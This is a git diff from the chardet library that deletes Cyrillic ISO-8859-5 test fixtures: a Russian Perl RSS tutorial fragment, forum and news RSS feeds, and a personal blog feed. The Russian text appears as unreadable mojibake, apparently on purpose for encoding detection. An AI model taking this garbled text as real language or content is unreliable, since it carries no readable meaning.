״װױג״ה״׀גאכ Perl א״וװ״גבן ״בל׳ׂ׀גל ױגװ get()). <span style="font-style:italic">»״בג״׃ 6</span> בװױאײ״ג ה״׃דא׀ז״כ ה׀.<br /><br /><span style="font-style:italic">»״בג״׃ 5: ¸בל׳ׂ׀״ױ ConfigReader::Simple.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use ConfigReader::Simple; -5 use LWP::Simple; -6 use Text::Template qw(fill_in_file); -7 use XML::RSS; -8 -9 my $config = ConfigReader::Simple-&gt;new( './rss.config' ); -10 -11 my $base = $config-&gt;base; -12 my $template = $config-&gt;template; -13 my $extension = $config-&gt;extension; -14 -15 my @files = split /\s+/, $config-&gt;files; -16 -17 foreach my $url ( @files ) -18 { -19 my $file = $url; -20 -21 $file =~ s|.*/||; -22 -23 my $result = open my $fh, &quot;&gt; $base/$file.$extension&quot;; -24 -25 unless( $result ) -26 { -27 warn &quot;Could not open [$file] for writing! $!&quot;; -28 next; -29 } -30 -31 my $rss = XML::RSS-&gt;new(); -32 my $data = get( $url ); -33 $rss-&gt;parse( $data ); -34 -35 print $fh fill_in_file( $template, HASH =&gt; $rss ); -36 close $fh; -37 }</pre></div><br /><span style="font-style:italic">»״בג״׃ 6: ִ׀ ה״׃דא׀ז״״.</span><br /><div class="code"><pre>1 base . -2 template rss-html.tmpl -3 files http://use.perl.org/useperl.rss -4 extension html</pre></div><br /><br /><span style="font-weight:bold">4. ·׀מחױ״ױ.</span><br /><br />ֿ ׃ד דױלט״גל א׀׳ױא ״ו א׃א׀, גװױןן װ ג ׃״״ אױװבג׀ׂױ״ן ״ ה״׃דא׀ז״ ״הא׀ז״״. ֽג א׀׳װױױ״ױ װױ׀ױג א׃א׀ד ׁױױ ׃״ׁ ״ אבג ׂ ׀װ׀ג׀ז״״ ׂכ אדײױ״ן. ָ׀ׁכ ׳ׂןמג ״׳ױןגל ׂכׂװ, ׀ ה״׃דא׀ז״כױ ה׀כ דא׀ׂןגל א׀ׁג א׃א׀כ ׁױ׳ ״׳ױױ״ן װ׀. Text::Template ״ ConfigReader::Simple װױ׀מג םג ׀בגל אבגכ, ׀בל ׂ׳ײ.<br /><br /><span style="font-weight:bold">5. ֱבכ״</span><br /><br />²בױ װד״, ד״׀ױכױ ׂ םג בג׀גלױ, ײ ׀ג״ ׀ Comprehensive Perl Archive Network (CPAN) - <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><span style="font-weight:bold">6. ¾ׁ ׀ׂגאױ.</span><br /><br />±א׀׀ װױ ִ (brian d foy) - ״׳װ׀גױל <span style="font-style:italic">The Perl Review</span>.<br /><br /><span style="font-weight:bold">¿א״ױח׀״ן.</span><br /><br /><span style="font-weight:bold"><sup>1</sup></span> &quot;Simple RSS with Perl&quot; by brian d foy, The Perl Review v0 i5, November 2002, <a target="_blank" href="http://www.theperlreview.com">http://www.ThePerlReview.com</a><br /><br /><span style="font-weight:bold"><sup>2</sup></span> <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><a target="_blank" href="http://www.theperlreview.com/Articles/v0i7/config.pdf">א״׃״׀ בג׀גל״ ׀ Perl Review (PDF)</a> - - »ׁ׀ׂ ¸׃אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-53.html - ´אד׃״ױ גױכ, בׂן׳׀כױ ב ט׀ׁ׀״ ״ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.9.xml b/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.9.xml deleted file mode 100644 index 34ac017..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.9.xml +++ /dev/null @@ -1,55 +0,0 @@ - - - - - ִאדכ Template Toolkit : ֿ׳כ א׃א׀״אׂ׀״ן Perl - http://forum.template-toolkit.ru/view_forum/forum_id-9.html?rss - Template Toolkit - ׁכבגא׀ן, י׀ן ״ א׀בט״אןױ׀ן ב״בגױ׀ ׁא׀ׁג״ ט׀ׁׂ. ½׀ ב׀גױ א׀ׁג׀ױג האד, ׂ גא ׁבדײװ׀מגבן ׂאבכ ״בל׳ׂ׀״ן ׁ״ׁ״גױ״ א׀ׁגױ ב ט׀ׁ׀״. ֲױכ, בׂן׳׀כױ ב א׃א׀״אׂ׀״ױ ׂ Perl - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Sun, 4 Dec 2005 16:14:30 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט׀ׁכ ׂ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - Sun, 4 Dec 2005 16:09:31 GMT - ±ױב׀גכ Perl-אױװ׀גא - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - ±ױב׀גכ Perl-אױװ׀גא װן Windows ב ײױבגׂױכ״ ״בגאדױג׀״ ג׀װ״ בא״גׂ.<br /> -<br /> -URL ׳׀׃אד׳״: <br /> -http://www.perl-express.com/PeSetRussv245.exe<br /> -´׀טןן בגא׀״ז׀: <br /> -http://www.perl-express.com/ru/ - - mixail <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-119.html - ´אד׃״ױ גױכ, בׂן׳׀כױ ב ט׀ׁ׀״ ״ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - Thu, 20 Jan 2005 10:34:47 GMT - JAPH - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - perl5.8<br /><div class="code"><pre>eval qq{#line $$ &quot;just another perl hacker&quot;\ndie};$@=~/j.+r/;print$&amp;;</pre></div> - - LIOL <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-56.html - ´אד׃״ױ גױכ, בׂן׳׀כױ ב ט׀ׁ׀״ ״ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/greek.ru.xml b/chardet/tests/iso-8859-5-cyrillic/greek.ru.xml deleted file mode 100644 index 6a10cc0..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/greek.ru.xml +++ /dev/null @@ -1,45 +0,0 @@ - - - - - - Greek.Ru - ¿חג״ ׂבױ ׃אױחױב ׀ אדבב. ³אױז״ן. ÷״א - http://www.greek.ru - - - - Greek.Ru - http://www.greek.ru/ru/news/ya/grekru.gif - http://www.greek.ru - 88 - 31 - - - - ³אױז״ן בױ׃װן: °ִ¸½ֻ ±¾ְֱֲֿֿ ֱ ¿ְ¾ֱֲ¸ֲֳֶ¸µ¹ - http://www.greek.ru/ru/news/news_detail.php?ID=994 - ²׀בג״ °ה״ ׀ח׀״ ׀׀״מ " ׃א׀״חױ״מ אבג״גדז״״ ״ ױ׳׀ ׀ג״ׂבג״ ״װדבגא״״ בױב׀". - - - - ³אױז״ן בױ׃װן: ² ³אױז״״ ׀אױבגׂ׀כ חױגׂױא ׁא״ג׀זױׂ ׳׀ ״׳ׁ״ױ״ױ ׂ׀װױלז׀ װ׃ ״׳ ׀׃׀׳״ׂ - http://www.greek.ru/ru/news/news_detail.php?ID=996 - ² ³אױז״״ ׀אױבגׂ׀כ חױגׂױא ׁא״ג׀זױׂ - ׂבױ חױכ װ בױל״, גאכױ ב״ל ״׳ׁ״״ ׂ׀װױלז׀ ױׁלט׃ ׀׃׀׳״ח״׀ ׁ״׳ "גדא״בג״חױב ¼ױ״" - ׀ה״ב׃ °אן. - - - - - ÷״א בױ׃װן: ֲדא״-״א״גכ אױװ׀׃׀מג בׁׂװ״גל ÷״א ג ״ - http://www.greek.ru/ru/news/news_detail.php?ID=990 - »״װױא גדא-״א״גׂ ְ׀דה ´ױג׀ט ׂכב׀׳׀בן ׳׀ ״ׂ״װ׀ז״מ ״כו ױ ׂװל װױ׀א׀ז״ ״״״, א׀׳װױןמיױ בגאׂ ׀ ׃אױחױבדמ ״ גדאױזדמ ח׀בג״. - - - - - ÷״א בױ׃װן: °ֲֲ¸»° ½°½µֱ ֳ´°ְ ¿¾ ÷¸¿ְֳ 29 »µֲ ½°·°´ - http://www.greek.ru/ru/news/news_detail.php?ID=952 - ְױבדׁ״׀ ÷״א ״ ׂױבל ׃אױחױב״ ״א גױג״״ 20 ״מן גא׀דאדמ װ׀גד בׂױ ״בגא״״. ְׂ 29 ױג ׀׳׀װ ׂ וװױ ױא׀ז״״ \ No newline at end of file diff --git a/chardet/tests/iso-8859-5-cyrillic/intertat.ru.xml b/chardet/tests/iso-8859-5-cyrillic/intertat.ru.xml deleted file mode 100644 index aed1895..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/intertat.ru.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -ְױבדׁ״׀ב׀ן םױגא׀ן ׃׀׳ױג׀ Intertat.RUֳחאױװ״גױױ °½¾ ְֽ³ Intertat.RU ןׂןױגבן ׀ׁ״ױג ¼״״בגאׂ ְױבדׁ״״ ֲ׀ג׀אבג׀. "Intertat.RU" ב׳װ׀׀ ¿בג׀ׂױ״ױ ¿א׀ׂ״גױלבגׂ׀ ְױבדׁ״״ ֲ׀ג׀אבג׀ ב׃׀ב ֳ׀׳ד ¿אױ׳״װױג׀ ְֲ ׂ 2001 ׃װד. ·׀אױ׃״בגא״אׂ׀ ¼״״בגױאבגׂ ױח׀ג״ ״ גױױא׀װ״ׂױי׀״ן ְִ. ֱׂ״װױגױלבגׂ אױ׃״בגא׀ז״״ ֱ¼¸ ֽ \ No newline at end of file diff --git a/chardet/tests/iso-8859-5-cyrillic/janulalife.blogspot.com.xml b/chardet/tests/iso-8859-5-cyrillic/janulalife.blogspot.com.xml deleted file mode 100644 index 313f2cd..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/janulalife.blogspot.com.xml +++ /dev/null @@ -1,165 +0,0 @@ - - - - - - -JaNuLa's L1FE MOMENTS -If you love Her as much as I love Her then you won't steal Her...I never know what the future brings -But I know she'll be here with me...Don't give me names -You've got it all, took it all from me -Drove me insane -Who'd come down to earth, releasing me -Healing my wounds -So why don't you close the door when you're leaving me -Now you'll run -Running all the way back to me again... -²בױג׀״ ױױ דא׀, ׳׀ח״ג ױ מׁ״... - -tag:blogger.com,1999:blog-11182692 -2005-11-27T14:59:40Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -lucky - -2005-11-20T18:50:00+02:00 -2005-11-20T17:39:14Z -2005-11-20T17:39:14Z - -tag:blogger.com,1999:blog-11182692.post-113250835408580855 -¿ױאׂכ בױ׃... ׂ םג ׃װד -<BODY><A HREF='http://photos1.blogger.com/blogger/7360/820/1024/collage11.jpg'><IMG SRC='http://photos1.blogger.com/blogger/7360/820/400/collage11.jpg' border=0 alt='' style='clear:all;float:left;margin: 0px 10px 10px 0px; cursor:hand'></A>&nbsp;<br /></BODY> ¿ױאׂכ בױ׃, גאכ ׁן׳׀גױל װײױ א׀בג׀ןגל. ¾גא׀ׂױױ בב -½׀װױמבל, גכ א׀װ׀ םגד ױאׂד,ׁױד, ח״בגד בױ׃ד :) א״ױב ב בׁ ח׀ב ׁיױ״ן ב מׁ״כ חױׂױ. ֵחד ״ ן ׂ״װױגל גױׁן ׂ ÷אױױ? ´׀, ױח, ׀ׂױאױ, בא ׁדװד, גח. :) ֲ׀ ױױ ׀בגד׀גל ׀ םגג ח״בגכ, ׁױכ בױײכ אׂ, ױ ׀וװ״טל? ²בױ ׂאד׃ ׳׀ ח׀ב בג׀ ח״בגכ ״ ג׀ ױׂ״כ...½׀װ׃ ״?&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - - -lucky - -2005-11-18T21:57:00+02:00 -2005-11-18T20:04:01Z -2005-11-18T19:57:00Z - -tag:blogger.com,1999:blog-11182692.post-113234382000287438 -¿א״ב׀ ױ ח״ג׀גל... -ֿ ׳׀מ ״א -- בג׀א ״ װאן״,<br />ֿ ׳׀מ ג״ז, ױגןי״ו ׀ ׀,<br />ֿ ׳׀מ, ׀ ׳ׂױ״ג װױל׃׀ ׂ ׀א׀ױ<br />¸ ׀ ׳ׂױ״ג גגחױכ ״.<br />ֿ ׳׀מ, ׀ מג ׀ םט׀הגױ,<br />ֿ ׳׀מ, ׀ זױדמג, ױ מׁן,<br />ֿ ׳׀מ גױו, ג <<׳׀>> ״ גױו, ג <<אג״ׂ>>,<br />ֿ ׳׀מ ׂבױ, גל ױ בױׁן.<br /><br />ֿ ׳׀מ טמו -- ״ ׃אװכ, ׀ װ׀כ,<br />ֿ ׳׀מ װ׀ -- ״ װױטױׂױ טמו,<br />ֿ ׳׀מ ג, חױ ח׀ג ׃װ׀״,<br />ֿ ׳׀מ ג, חג א״׳בןג ׂבדו,<br />ֿ ׳׀מ, ׀ ׳ױא ממג ׀ׂ״כ<br />¸ ׀ ׂאכ גאדכ גױאױׁןג,<br />ֿ ׳׀מ ײ״׳ל -- ׀ ױ ׁדװױג װ״,<br />ֿ ׳׀מ ׂבױ, גל ױ בױׁן.<br /><br />ֿ ׳׀מ ״א -- ױ׃ בדװ״גל ױ׃ ׀,<br />²ױװל ׂבױ װ בׂױאטױבגׂ׀ װ׀ױ,<br />ֿ ׳׀מ, ׀ ח׀ג ױאױװ ׳׀,<br />¸ ׳׀מ, ׀ א ח״ג ׳׀.<br />ֿ ׳׀מ, ׀ ׳׀ וׂבג ׂ״גל דװ׀חד,<br />²בױו א׀בג׀ׂ ״ ׀ײװד ׃אדׁן,<br />ֿ ׳׀מ -- גל ג׀, ׀ ױ ״׀חױ...<br />ֿ ׳׀מ ׂבױ, גל ױ בױׁן.<br /><br /><br /> (ב) ¾. »׀װכײױב״, 1998<br /><a href="http://lib.ru/OLDI/poez.txt"></a> -false - - - - -lucky - -2005-11-16T03:39:00+02:00 -2005-11-16T01:49:16Z -2005-11-16T01:49:16Z - -tag:blogger.com,1999:blog-11182692.post-113210575690319678 -²״װ ב ױ׃ ׀... -<a href="http://photos1.blogger.com/blogger/7360/820/1024/collage10.jpg"><img style="CLEAR: all; FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/7360/820/400/collage10.jpg" border="0" /></a> <br /><br />...ֱׂ׳ל דיױכױ ׂױ״<br />²״ײד, ׂ״ײד, גכ ב -<br />¸ ׂ אדױ גׂױ ׀ׂױ״<br />½ױגאכגכ ׂױױא .<br /><br />¾גג׃, חג בג׀״ אןװ<br />¼כ ׂ ׁ׀ײױכ ״׃ חדװױב.<br />² ״׃, ׃װ׀ ׀װ »ױג״ ֱ׀װ<br />¼ױבןז א׳ׂכ ׂבאױב -<br /><br />¼ױ ױ ׀װ ײ״װ׀״<br />ֳ בגכ׃ ׀<br />¸ ג״גױלכו בׂ״װ׀״.<br />°ו! מׁׂל דגױ׀.<br /><br />ֲכ בׁׂװ׀, ן בׁׂװ׀,<br />·׀ׂגא׀ דחטױ, חױ ׂחױא׀... <br /><br />°.°ו׀גׂ׀&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - -lucky - -2005-11-07T19:18:35+02:00 -2005-11-07T17:18:35Z -2005-11-07T17:18:35Z - -tag:blogger.com,1999:blog-11182692.post-113138391513670714 -interesno, znaesh' li ty, gde ona seichas? -na samo... - -
    interesno, znaesh' li ty, gde ona seichas?
    na samom dele...
    -Posted by Lucky -
    -
    -false -
    - - - -lucky - -2005-10-10T01:29:46+03:00 -2005-10-09T22:29:46Z -2005-10-09T22:29:46Z - -tag:blogger.com,1999:blog-11182692.post-112889698613197046 -*** - -
    -÷׀ ׁכ וגױבל ׁכגל ב גׁ, ²בס ׂאױן בכט׀גל ׃ב גׂ! ¿א״ײ׀גל גױׁן בׂױ ׃אדװ״, ב׀׳׀גל: ?»מׁ״׀ן, אבג״!?. ·׀ ׃דכױ בׂ׀ ״ ׁל, אבג״! ·׀ װױגב״ בױו ״ טכױ א״׳׀״ן. ´ גדבג״ דאױ ח׀״ױ. ¸ ׳׀ ״ ״חסכױ בג׀א׀״ן. ¿אבג״ ׳׀ םג״ ״װ״גב״ױ בג״ו״! ¸ ׳׀ װאד׃״ױ, חג ׃װ׀-ג ׁדװדג! ¿אבג״ ׳׀ ױבׂױאטסכױ ׃אױו״, ·׀ ױבׂױאטסױ ױ בדװןג! ¿אבג״, חג ױבגל ן ׀ ׳ױױ. ¿אבג״! ¸, ױב״ ׂװאד׃ ױ ׁדװױג? ¿אבג״, חג מ גױׁױ! ¿אבג״, חג בױאװזױ ױ ׳׀ׁדװױג!? -
    -
    -false -
    - - - - -lucky - -2005-10-07T23:22:00+03:00 -2005-10-09T22:30:22Z -2005-10-07T20:22:54Z - -tag:blogger.com,1999:blog-11182692.post-112871657428923627 -no title - -
    Xxxx (10:29 PM) :
    װ׀, ״ א״וװ״גבן װׂ״׃׀גלבן װ׀לטױ..
    Fallen_Angel (10:30 PM) :
    א׀׳ׂױ חג אבג װׂ״׃׀גלבן (ט״אןגלבן):-)
    ד גױׁן ױבגל ׂבױ...״ םג׃ ׂבױ׃ ױ ׀װ...ׁױ׳
    Fallen_Angel (10:30 PM) :
    ׂבױ ג׀ גױאןױג ׂבן״ בכב: ד חױד בגאױ״בן, חױ ױחג׀...
    Xxxx (10:31 PM) :
    גכ גױאן׀ מׁ״׃ חױׂױ׀?
    Fallen_Angel (10:32 PM) :
    ׀׃׀, ד ױן ױ׃ אבג דׂױ״: ג׀ ׁ׀׀ל..
    ׳׀ױטל ׀? גד..חױאױ׳ ׀בלד...ן װ ב״ו א ױ ׃ד ןגל...
    Fallen_Angel (10:33 PM) :
    ׀ חג ױ ׃ד ןגל- אבג ױ ׃ד אױו׀גל, ׀ גכ ׃ׂא״טל װׂ״׃׀גלבן װ׀לטױ:
    ן אבג-בײ ױ ״׀מ...
    Xxxx (10:34 PM) :
    ֲ׃װ׀ ױ דׁ״ׂ׀בן, גג, ׃ ײ דׂױבג״, ױ ׃׃ בג״ג. ֲׂ ׃׀ׂכ דײח״׀ ײװסג גױׁן ׂױאױװ״, א׀װ״ ױ׃ דײ ״װג״ װ׀לטױ....
    Fallen_Angel (10:34 PM) :
    ג׀ ׂבױ ױאױחױאדג...ן ׁכ׀ ²בױױ,
    Fallen_Angel (10:35 PM) :
    ׳׀ױטל ׂ חױ א״...םג ױ ׁכ דײח״׀...
    ׂװו״....ױ ״גױאױב׀ אױ׀ז״ן...:-)
    Fallen_Angel (10:36 PM) :
    םג ׁכ׀ ן בדװלׁ׀...
    Fallen_Angel (10:36 PM) :
    ן םג ג׀ ׳׀מ....
    Fallen_Angel (10:36 PM) :
    ׁױ׳ ׃׀װ׀״ ׀ׂױאן׀...
    Xxxx (10:36 PM) :
    ױ ׂ׀ײ..
    ½׀׳ׂױ אבג מׁ״כ חױׂױ
    Fallen_Angel (10:37 PM) :
    ׳׀ױטל, ן גכבןחד א׀׳ ׃ׂא״׀ ׳׀ 4 ׃װ׀ "מׁמ"
    ׀ ׃דׁ״ד בכב׀ ב׳׀׀, גל ׃װ׀ ׀ ״בחױ׳׀ ב ױ ײ״׳״....
    ג׀ בגא׀...
    Xxxx (10:39 PM) :
    ג׃װ׀ מׁ״ װ׀לטױ, מׁ״ ׂבױ׃װ׀,
    ׂױװל ׀בגןי׀ן מׁׂל ױ גאױׁדױג ׀׃א׀װכ ״ יאױ״ן
    Fallen_Angel (10:40 PM) :
    ױאׂכ חױׂױ, גאכ ן, חג ן מׁמ ױױ ױ בגאן ״ ׀ חג!
    ׂבױ װאד׃״ױ ׃ׂאןג- ׳׀ׁדװל, ׀חג״ ײ״׳ל ׳׀ׂ ״ ג.װ.:-(
    ן ג׀ בדח׀מ ױ...
    -
    Fallen_Angel (10:41 PM) :
    ן ג׀ ױ ׃ד א׀׳ױןגלבן ׀ ״ז׀, ׂ גאכו ױג ױױ...
    Fallen_Angel (10:42 PM) :
    ׀ ׳׀׀׳׀׀ ױן ׂ זױ״גױל״זכ, חגׁכ ױן ׂכױח״״ ג ױױ...
    Fallen_Angel (10:43 PM) :
    חגׁכ ן ׳׀ׁכ׀, חגׁכ ױ ױ ׁכ ג׀ ׁל...
    Fallen_Angel (10:43 PM) :
    ׀ ױ ״׀ױג...
    Xxxx (10:43 PM) :
    ½׀יױג »״״ג- םג חױא׀ן ד׀
    ֿ ג׀ ײױ בדח׀מ ׁ דגא׀חױ חױׂױױ, ױ ״חױ׃ ױ בג׀ױגבן, ׀ גל ״גלבן ס...
    -
    Xxxx (10:45 PM) :
    ·׀, חג ״׀׀ן ׁל ױ װ״גלבן ׂױח.
    Fallen_Angel (10:45 PM) :
    ׳׀ױטל, ״א בג׀ׂ״גבן ג׀ ׁױ׳בכבױ, ׃אדׁ ״ ױׂכב״, ׃װ׀ א״בוװןג ׂױי״ ׂאװױ םג״ו...
    Fallen_Angel (10:45 PM) :
    ן ׁ׀א׀...ׂױאױױ גױױז אײװױכ ׂ ׃װ ׁכ׀...ד ױן םג דײױ ב הױׂא׀ן ױבןז׀...
    Fallen_Angel (10:47 PM) :
    ן אבג ״׃א׀מ ׂ טד : ב׀ד בױׁן בח׀בג״ׂדמ ׀ מװןו...
    װ ׂ׳ׂא׀י׀גלבן אבג ױׂכב״....
    Fallen_Angel (10:48 PM) :
    ׀ בג׀ׂ״׀ ׂבױ ג, חג ג׀ מׁ״׀...
    Xxxx (10:48 PM) :
    אבג דכׁ״בל,
    ױב״ גכ מׁ״טל, װײױ ׁכגל בׂױג, מׁׂ״ ױ ׁכׂ׀ױג ׁױ׳ בׂױג׀, װ׀ײױ ױב״ ׁל
    Xxxx (10:49 PM) :
    ״ ב׀ײד גױׁױ ׀ דט:
    ²ְֱֲֵֿ½¸ֱּ ״ ױאױבג׀ל בױׁן ײ׀ױגל
    Fallen_Angel (10:49 PM) :
    ן o'k... ן ׂ ב׀ װױױ דכׁ׀מבל: ן א׀װ׀ ׀ײװד בױחד\װײװ״ׂד װמ...
    מׁ ױח״, םג ׂבױ ױ ג ׁױ׳ ױױ: ן ׀א׀ױל ײ״ׂד ב׀׀ ב בׁ...ן ױ ׳׀מ ׀ םג ׁלןב״גל...
    ״ג בױׁן ױ ײ׀ױױג...
    Fallen_Angel (10:50 PM) :
    ד ױן ׂבױ ױבגל, ן ׀ׁבמג ב׀װבג׀גחכ חױׂױ...ױ ״חױ׃ ױ ׀װ ׁױ׳ ״ױ ױױ...
    Xxxx (10:51 PM) :
    ױבגל ט׀ב, חג ׀ ׂױאסגבן?
    Fallen_Angel (10:52 PM) :
    ױ ׳׀מ, ׀ ׃ׂא״ג, חג מׁ״ג ױן. דײױ -װאד׃ד...
    ן ױ ׂױאמ ״ ױװ״ד ױױ בׂד...ׂבױ׃ ג׀ ׃, חג ײ ״ב׀גל ׁױבגבױױא...
    Fallen_Angel (10:53 PM) :
    ׀ אבג ב׀״׀בל. ן אבג ׃׀ ״חױ׃ ױ ד׳׀גל, ײױג ׁכגל ׀ ׁכ װ׀ײױ בױח׀ב ׁכ׀ ׁכ װ׀...
    ״׃װ׀ ן װד׀מ, בג״ ״ ױ ױ׳גל ׂ ױױ ...
    Fallen_Angel (10:53 PM) :
    ׂױאױױ ׂ , גאכ ׀ ל׳ׂ׀׀בל....
    Fallen_Angel (10:54 PM) :
    ג, ׀ װן״ ײױג ׀ ׁא׀גל בגׂכ...
    Fallen_Angel (10:55 PM) :
    ג אבג ׳ׂ״גל ״ באב״גל ׀ ד ױן װױ׀?:-)
    Fallen_Angel (10:55 PM) :
    ױן ׀ח״׀ױג ״״גל ג׀, חג ן ױ ׃ד ב׀׳׀גל ״ בׂ׀...
    Fallen_Angel (10:56 PM) :
    ׀ ג׃װ׀ דׁױײװ׀ױגבן. חג ױ ױ בג״ ׳ׂ״גל ....ׁאױװ...
    ן וחד װאד׃ ׃ׁדב....
    Xxxx (10:56 PM) :
    ׂ׀ ׀װ א׀׳ׁא׀גלבן ױײװד בׁ,
    ױ ׁלטױ ױחױ׃ ב׀׳׀גל ...
    -
    Fallen_Angel (10:56 PM) :
    ״װױױ ׀ ׁדװױג ײ״גל ׂ גׂױ ׃אװױ...
    Fallen_Angel (10:57 PM) :
    כ בג א׀׳ א׀׳ׁ״א׀״בל...׀ מׁ״ג ׀ב װׂ״ו...םג׃ °׳׀ ״ ױן...
    Fallen_Angel (10:58 PM) :
    חדׂבגׂ ׂ״כ ױט׀ױג ױ ׂױאדגלבן: ׀ װד׀ױג, חג א׀ ״״ ׳װ ״ױ ״׳=׳׀ םג׃ כ ׂ ״ג׃ױ א׀׳װױבן...
    Fallen_Angel (10:59 PM) :
    ׳׀ױטל, ן ׳ׂ״׀ ױ׃ אװ״גױן ׂ ÷¿...
    Fallen_Angel (11:00 PM) :
    ױ ג׀ ׂ׀ײ ׁכ ׳׀גל, ׀ ״ גבןגבן גד, חג ״ו בכ "ׂ׳ײױ׀ ײױד ׁ״ײױ׃ בׂױ׃" ׳׀ן ג, ׀ םגג ׁ״ײ״ בגא׀װ׀ױג ג םג׃, ״ ׳׀ױטל חג?
    Fallen_Angel (11:04 PM) :
    ױ׃ ׀ח׀ ״בד׃׀׀בל, ׳ׂ׀׀ ׀חד, ׀׀ ב ׀ג׀״ ױן ב׀ ״ ב׀׳׀, חג בג א׀׳ ׂ׀׳״ ׂ חדײ״ױ ײ״׳״ ״ גל ׃אװ״גבן םג״, בׂױגׂ׀ ױ אגאױ׳ׂױגל, וגן ן ױ למ ׁׂיױ...ד, ׂ ׁיױ ¶ױל׀ ׂ ואט״ו אד׀ו...
    Fallen_Angel (11:04 PM) :
    םג״ מװ״ ב׀״ װױ׀מג םגג ״א ג׀״ ױׂכב״כ...
    -
    -false -
    - - - - -lucky - -2005-07-11T00:11:33+03:00 -2005-07-10T21:11:33Z -2005-07-10T21:11:33Z - -tag:blogger.com,1999:blog-11182692.post-112102989342403583 -ֱ״ב בח׀בג״ׂח״׀ - -
    ז״״׳ -
    ם׃״׳ -
    ב״לױ דװׂױגׂאױױ ײױ׀״ױ בױב׀ (ױמׁׂ״) -
    ׀בז״׀לבגל -
    חאױ׳ױאכױ גאױׁׂ׀״ן ׁ״׳״ -
    ײױבגחסױ א׀ׂװדט״ױ אדײ׀מי״ -
    ו׀ג״חבגל ״ ױאױױח״ׂבגל ׁדײװױ״ -
    גבדגבגׂ״ױ בהא״אׂ׀כו א׀לכו דבג׀ׂ -
    ׁױבב״לױ ׁױ׳א׀׳״ח״ױ ׂכטױױאױח״בױד -
    -
    ÷׀ גל ן ׂכ״װכׂ׀מ חױׂױ׀ ״׳ בׂױ ײ״׳״ ... ןׂןױגבן..:) -
    ״ ׂבױ ׀ח״׀ױגבן בׂ׀:)¼כ ח׀בג גאױ׀ױבן ג ׃-ג, גאױ׳׀ױ בא׀׳ד, װד׀ן, חג ג׀ ױלטױ ׁ״.¼כ ׳׀אכׂ׀ױ װׂױא״ ׀׃דו,׀ ״א״ח׀ן בגױ׀ ״״ כג׀ױבן ד׀׳׀גל ׀ ױױ ׀ ׁדװג ׂ ױױ ײ ׂכג״. -
    ¼כ דוװ״ ״ ױ ׁא׀ח״ׂ׀ױבן, וגן ׀ ב׀ װױױ ױיס װ׃ כבױ ג׀ ׀וװ״בן. -
    ֲיױג כג׀ױבן גאׂ׀גלבן ג גױ״, ״׀ױ, חג ג ױס ױ ״׳ׁ׀ׂ״גלבן, ײ ״טל ױ ׁא׀י׀גל ׂ״׀״ן ׀ ױס ״״ ׀גל ׂדמ.. -
    ׀ א׀ׂ״גבן....¿אטױ אבג״גל ב בױװדמי״ ׳׀ׁׂױ״ױ... -
    ״״ -
    ½״׃װ׀ ױ ׁכגל איױכ.. ״ ׂױח ױ ׳׀ׁכגכ... -
    ״ ױ אבג״גל ״ ׂױח ױ ׳׀ׁכגל...¸ ״׃װ׀ ׁלטױ ױ ׳׀ׁױגל ױ״׳ױח״ ׁױ׳למ, גא דײױ ׂכא׀ׁג׀ בג״ ״ד״גױג, ״װג״ ײ״׳לן ׂכו גױױ בל׳ן ״ ױ בׂן׳׀ ׁ״׳,״׀ן, חג ״חױ׃ ג׀׃ ״ ׂ ױג, ׀ םג׃ ױ ׁכ ״ װ םג׃, ׂבױ א״װד׀ ״ ״װױ׀״׳״אׂ׀ אבג ׂ ׳׃׀ו.¼׳׃ חױׂױ׀ װ ב״ו א ׂבלױ חדװ בׂױג׀,גױ ׁױױ ״. -
    -
    -
    -false -
    -
